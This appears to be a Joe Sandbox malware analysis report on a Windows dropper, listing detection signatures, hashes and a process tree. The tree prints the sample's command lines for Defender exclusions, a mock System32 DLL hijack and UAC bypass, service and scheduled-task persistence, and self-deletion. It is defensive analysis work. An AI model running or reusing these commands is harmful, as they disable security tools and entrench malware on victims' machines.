Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ld0f3NDosJ.exe

Overview

General Information

Sample name:Ld0f3NDosJ.exe
renamed because original name is a hash value
Original sample name:00948444f3e248047722667419d54205.exe
Analysis ID:1496433
MD5:00948444f3e248047722667419d54205
SHA1:ca291799966f2a1d8ec8cdab92daa6883bddac9e
SHA256:c97c029e6368bf6502e9c9c9ee0fc079c61da9e79c3798e8a246d19446b5afa8
Tags:exe
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: TrustedPath UAC Bypass Pattern
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates a Windows Service pointing to an executable in C:\Windows
Drops executables to the windows directory (C:\Windows) and starts them
Found API chain indicative of debugger detection
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Self deletion via cmd or bat file
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious New Service Creation
Uses schtasks.exe or at.exe to add and modify task schedules
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to create an SMB header
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • Ld0f3NDosJ.exe (PID: 3552 cmdline: "C:\Users\user\Desktop\Ld0f3NDosJ.exe" MD5: 00948444F3E248047722667419D54205)
    • cmd.exe (PID: 5236 cmdline: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6772 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 5088 cmdline: cmd.exe /c start "" "C:\Users\user\Desktop\pyld64.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • pyld64.exe (PID: 4388 cmdline: "C:\Users\user\Desktop\pyld64.exe" MD5: 43BCE45D873189F9AE2767D89A1C46E0)
        • cmd.exe (PID: 7072 cmdline: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5412 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 6252 cmdline: cmd.exe /c start "" "C:\Windows\System32\usvcinsta64.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 4488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • usvcinsta64.exe (PID: 2736 cmdline: "C:\Windows\System32\usvcinsta64.exe" MD5: 11DDC0A34BAC7AB099D2EE8D9817BF58)
            • cmd.exe (PID: 4156 cmdline: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 3884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • powershell.exe (PID: 6600 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • cmd.exe (PID: 4044 cmdline: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 4892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • powershell.exe (PID: 5564 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • cmd.exe (PID: 6728 cmdline: cmd.exe /c mkdir "\\?\C:\Windows \System32" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 3084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 4888 cmdline: cmd.exe /c start "" "C:\Windows \System32\printui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 2224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • printui.exe (PID: 4388 cmdline: "C:\Windows \System32\printui.exe" MD5: 2FC3530F3E05667F8240FC77F7486E7E)
            • cmd.exe (PID: 880 cmdline: cmd.exe /c timeout /t 10 /nobreak && del "C:\Windows\System32\usvcinsta64.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 1396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • timeout.exe (PID: 1948 cmdline: timeout /t 10 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • cmd.exe (PID: 6700 cmdline: cmd.exe /c timeout /t 10 /nobreak && del "C:\Users\user\Desktop\pyld64.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 6116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 2732 cmdline: timeout /t 10 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • cmd.exe (PID: 4392 cmdline: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 6308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 2820 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 5668 cmdline: cmd.exe /c sc create x543664 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x543664\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x543664.dat" /f && sc start x543664 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 5316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • sc.exe (PID: 6928 cmdline: sc create x543664 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • reg.exe (PID: 7072 cmdline: reg add HKLM\SYSTEM\CurrentControlSet\services\x543664\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x543664.dat" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • sc.exe (PID: 2812 cmdline: sc start x543664 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • cmd.exe (PID: 5836 cmdline: cmd.exe /c start "" "C:\Windows\System32\console_zero.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 2364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • console_zero.exe (PID: 2224 cmdline: "C:\Windows\System32\console_zero.exe" MD5: 74CF33F8C2FCB56F749AAF411B9AE302)
            • cmd.exe (PID: 7064 cmdline: cmd.exe /c schtasks /delete /tn "console_zero" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 5208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 6904 cmdline: schtasks /delete /tn "console_zero" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • cmd.exe (PID: 6564 cmdline: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 3496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 4392 cmdline: schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • cmd.exe (PID: 6644 cmdline: cmd.exe /c timeout /t 10 /nobreak && rmdir /s /q "C:\Windows \" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 6648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 2744 cmdline: timeout /t 10 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
    • cmd.exe (PID: 5020 cmdline: cmd.exe /c timeout /t 10 /nobreak && del "C:\Users\user\Desktop\Ld0f3NDosJ.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 2332 cmdline: timeout /t 10 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
  • svchost.exe (PID: 4816 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 5564 cmdline: C:\Windows\System32\svchost.exe -k DcomLaunch MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • cmd.exe (PID: 4892 cmdline: cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5048 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32' MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 6308 cmdline: cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3492 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'E:\' MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 4888 cmdline: cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3908 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'F:\' MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 7032 cmdline: cmd.exe /c start "" "c:\windows\system32\crypti.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • crypti.exe (PID: 6252 cmdline: "c:\windows\system32\crypti.exe" MD5: D8C562EEBC88199B8D0E7274782C531D)
    • cmd.exe (PID: 3800 cmdline: cmd.exe /c start "" "c:\windows\system32\crypti.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • crypti.exe (PID: 6600 cmdline: "c:\windows\system32\crypti.exe" MD5: D8C562EEBC88199B8D0E7274782C531D)
    • cmd.exe (PID: 880 cmdline: cmd.exe /c start "" "c:\windows\system32\crypti.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • crypti.exe (PID: 6076 cmdline: "c:\windows\system32\crypti.exe" MD5: D8C562EEBC88199B8D0E7274782C531D)
    • cmd.exe (PID: 4328 cmdline: cmd.exe /c start "" "c:\windows\system32\crypti.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • crypti.exe (PID: 6928 cmdline: "c:\windows\system32\crypti.exe" MD5: D8C562EEBC88199B8D0E7274782C531D)
    • cmd.exe (PID: 1484 cmdline: cmd.exe /c start "" "c:\windows\system32\crypti.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • crypti.exe (PID: 6308 cmdline: "c:\windows\system32\crypti.exe" MD5: D8C562EEBC88199B8D0E7274782C531D)
    • cmd.exe (PID: 1864 cmdline: cmd.exe /c start "" "c:\windows\system32\crypti.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • crypti.exe (PID: 3884 cmdline: "c:\windows\system32\crypti.exe" MD5: D8C562EEBC88199B8D0E7274782C531D)
    • cmd.exe (PID: 6728 cmdline: cmd.exe /c start "" "c:\windows\system32\crypti.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • crypti.exe (PID: 6244 cmdline: "c:\windows\system32\crypti.exe" MD5: D8C562EEBC88199B8D0E7274782C531D)
    • cmd.exe (PID: 1056 cmdline: cmd.exe /c start "" "c:\windows\system32\crypti.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • crypti.exe (PID: 4996 cmdline: "c:\windows\system32\crypti.exe" MD5: D8C562EEBC88199B8D0E7274782C531D)
    • cmd.exe (PID: 2784 cmdline: cmd.exe /c start "" "c:\windows\system32\crypti.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • crypti.exe (PID: 1424 cmdline: "c:\windows\system32\crypti.exe" MD5: D8C562EEBC88199B8D0E7274782C531D)
  • console_zero.exe (PID: 7040 cmdline: C:\Windows\System32\console_zero.exe MD5: 74CF33F8C2FCB56F749AAF411B9AE302)
    • cmd.exe (PID: 6488 cmdline: cmd.exe /c schtasks /delete /tn "console_zero" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 5820 cmdline: schtasks /delete /tn "console_zero" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 7080 cmdline: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7020 cmdline: schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: TrustedPath UAC Bypass Pattern
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows \System32\printui.exe" , CommandLine: "C:\Windows \System32\printui.exe" , CommandLine|base64offset|contains: , Image: C:\Windows \System32\printui.exe, NewProcessName: C:\Windows \System32\printui.exe, OriginalFileName: C:\Windows \System32\printui.exe, ParentCommandLine: cmd.exe /c start "" "C:\Windows \System32\printui.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4888, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows \System32\printui.exe" , ProcessId: 4388, ProcessName: printui.exe
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Windows\System32\usvcinsta64.exe, ProcessId: 2736, TargetFilename: C:\Windows \System32\printui.dll
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, CommandLine: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\console_zero.exe" , ParentImage: C:\Windows\System32\console_zero.exe, ParentProcessId: 2224, ParentProcessName: console_zero.exe, ProcessCommandLine: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, ProcessId: 6564, ProcessName: cmd.exe
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, CommandLine: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\console_zero.exe" , ParentImage: C:\Windows\System32\console_zero.exe, ParentProcessId: 2224, ParentProcessName: console_zero.exe, ProcessCommandLine: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, ProcessId: 6564, ProcessName: cmd.exe
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop'", CommandLine: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Ld0f3NDosJ.exe", ParentImage: C:\Users\user\Desktop\Ld0f3NDosJ.exe, ParentProcessId: 3552, ParentProcessName: Ld0f3NDosJ.exe, ProcessCommandLine: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop'", ProcessId: 5236, ProcessName: cmd.exe
Sigma detected: Suspicious New Service Creation
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc create x543664 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , CommandLine: sc create x543664 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd.exe /c sc create x543664 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x543664\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x543664.dat" /f && sc start x543664, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5668, ParentProcessName: cmd.exe, ProcessCommandLine: sc create x543664 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , ProcessId: 6928, ProcessName: sc.exe
Sigma detected: Powershell Defender Exclusion
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop'", CommandLine: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Ld0f3NDosJ.exe", ParentImage: C:\Users\user\Desktop\Ld0f3NDosJ.exe, ParentProcessId: 3552, ParentProcessName: Ld0f3NDosJ.exe, ProcessCommandLine: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop'", ProcessId: 5236, ProcessName: cmd.exe
Sigma detected: New Service Creation Using Sc.EXE
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create x543664 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , CommandLine: sc create x543664 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd.exe /c sc create x543664 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x543664\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x543664.dat" /f && sc start x543664, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5668, ParentProcessName: cmd.exe, ProcessCommandLine: sc create x543664 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , ProcessId: 6928, ProcessName: sc.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop'", CommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5236, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop'", ProcessId: 6772, ProcessName: powershell.exe
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, ProcessId: 4816, ProcessName: svchost.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\hardsvcupdt[1].exeReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\hardsvcupdt[1].exeVirustotal: Detection: 64%Perma Link
Source: C:\Users\user\Desktop\pyld64.exeReversingLabs: Detection: 18%
Source: C:\Users\user\Desktop\pyld64.exeVirustotal: Detection: 64%Perma Link
Source: C:\Windows \System32\printui.dllReversingLabs: Detection: 62%
Source: C:\Windows\System32\console_zero.exeReversingLabs: Detection: 18%
Source: C:\Windows\System32\usvcinsta64.exeReversingLabs: Detection: 58%
Source: C:\Windows\System32\x543664.datReversingLabs: Detection: 41%
Multi AV Scanner detection for submitted file
Source: Ld0f3NDosJ.exeReversingLabs: Detection: 52%
Source: Ld0f3NDosJ.exeVirustotal: Detection: 54%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\Desktop\pyld64.exeJoe Sandbox ML: detected
Source: C:\Windows\System32\x543664.datJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\hardsvcupdt[1].exeJoe Sandbox ML: detected
Machine Learning detection for sample
Source: Ld0f3NDosJ.exeJoe Sandbox ML: detected
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33342D0 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,CRYPTO_zalloc,CRYPTO_THREAD_lock_new,ERR_new,ERR_set_debug,CRYPTO_strdup,OPENSSL_LH_new,OPENSSL_LH_set_thunks,ERR_new,X509_STORE_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,OPENSSL_sk_num,ERR_new,OPENSSL_sk_new_null,ERR_new,OPENSSL_sk_new_null,ERR_new,CRYPTO_new_ex_data,ERR_new,RAND_bytes_ex,RAND_priv_bytes_ex,RAND_priv_bytes_ex,RAND_priv_bytes_ex,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,53_2_00007FFDA33342D0
